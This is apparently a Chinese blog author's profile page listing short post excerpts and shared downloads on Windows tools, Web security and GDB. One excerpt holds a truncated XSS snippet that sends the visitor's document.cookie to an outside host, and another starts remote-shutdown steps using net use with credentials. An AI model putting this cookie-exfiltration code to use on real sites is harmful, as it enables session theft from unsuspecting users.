自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 资源 (10)
  • 收藏
  • 关注

原创 微软的15个免费的有用的工具:

1) WSCC – Windows System Control Center 2) RichCopy 4.0 3) Microsoft Attack Surface Scanner 4) Microsoft Standalone System Sweeper Tool

2011-08-02 13:41:52 926

原创 一个自动将cookie发送到自己网站的XSS脚本!

{\"country\":\"USvar u='http://www.mysite.com:8080/m.do?m='+window.document.cookie;var h= document.getElementsByTagName('head').item(0);var

2011-08-02 13:29:24 894

原创 如何关闭远程计算机

如何关闭一个远程计算机,步骤如下:     1)net use \\IP "Password" /user:username     IP是目标计算机的IP地址,Password是用户登录的密码 username是登录用的用户名,如果是域用户的话,还需要加上域名,

2011-08-02 10:15:47 1619

CEH_Official_Certified_Ethical_Hacker_Re.pdf

介绍Ethical hacker的一些基础知识。

2021-04-27

unlocker-3.0.3.zip

该工具是解锁VMware,从而能够导入MAC OS的虚拟机,由于作者本人的github上已经没有了工具的信息,在此分享最新版本,并且附上最新的一个github的地址。

2020-03-30

谷歌拼音输入法

今天搜索谷歌拼音输入法已经不能再从google网站上下载了,在这里保存一个安装版本,以供使用。

2018-11-14

web hacking - attacks and defense

web hacking - attacks and defense 是关于Web 应用安全的攻防介绍的教材。其中的一些技巧值得借鉴.

2014-09-18

Web之困:现代Web应用安全指南

Web之困:现代Web应用安全指南,是一本比较全面的介绍Web安全相关的标准以及相关安全问题的好书。

2014-02-13

OCCI 接口封装包

封装了OCCI的底层接口,是的操作变得容易,而且方便。 只需要配置连接池的参数,调用一下初始化函数,然后,你就可以方便的执行查询和增删改的SQL。详细信息,请参考Readme.txt.

2009-08-05

嵌入式Linux性能详解

本资料详细介绍了Linux的内存管理方式,并且详细介绍了各种内存的管理方法,以及编程注意事项,如何优化程序的内存。看了本资料你会对Linux的内存的各个方面有了一个很深入的理解。

2009-07-01

C 预处理器介绍以及如何实现的

本资料描述了C++预处理器做了那些工作,以及如何做的。特别是一些编程的注意事项,对于编程也有提高!

2009-06-26

gdb 培训材料 ppt

自己根据搜索资料著作的一个一个GDB的培训的PPT,通过这个PPT可以掌握所有的使用gdb的调试技巧。另外,还添加了一些自己在工作中经常使用的一些命令的组合。

2009-01-07

gdb 培训资料-全面掌握GDB的使用方法

很多人只使用了GDB的一些基本功能,这个材料则描述了GDB的整体功能。

2009-01-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除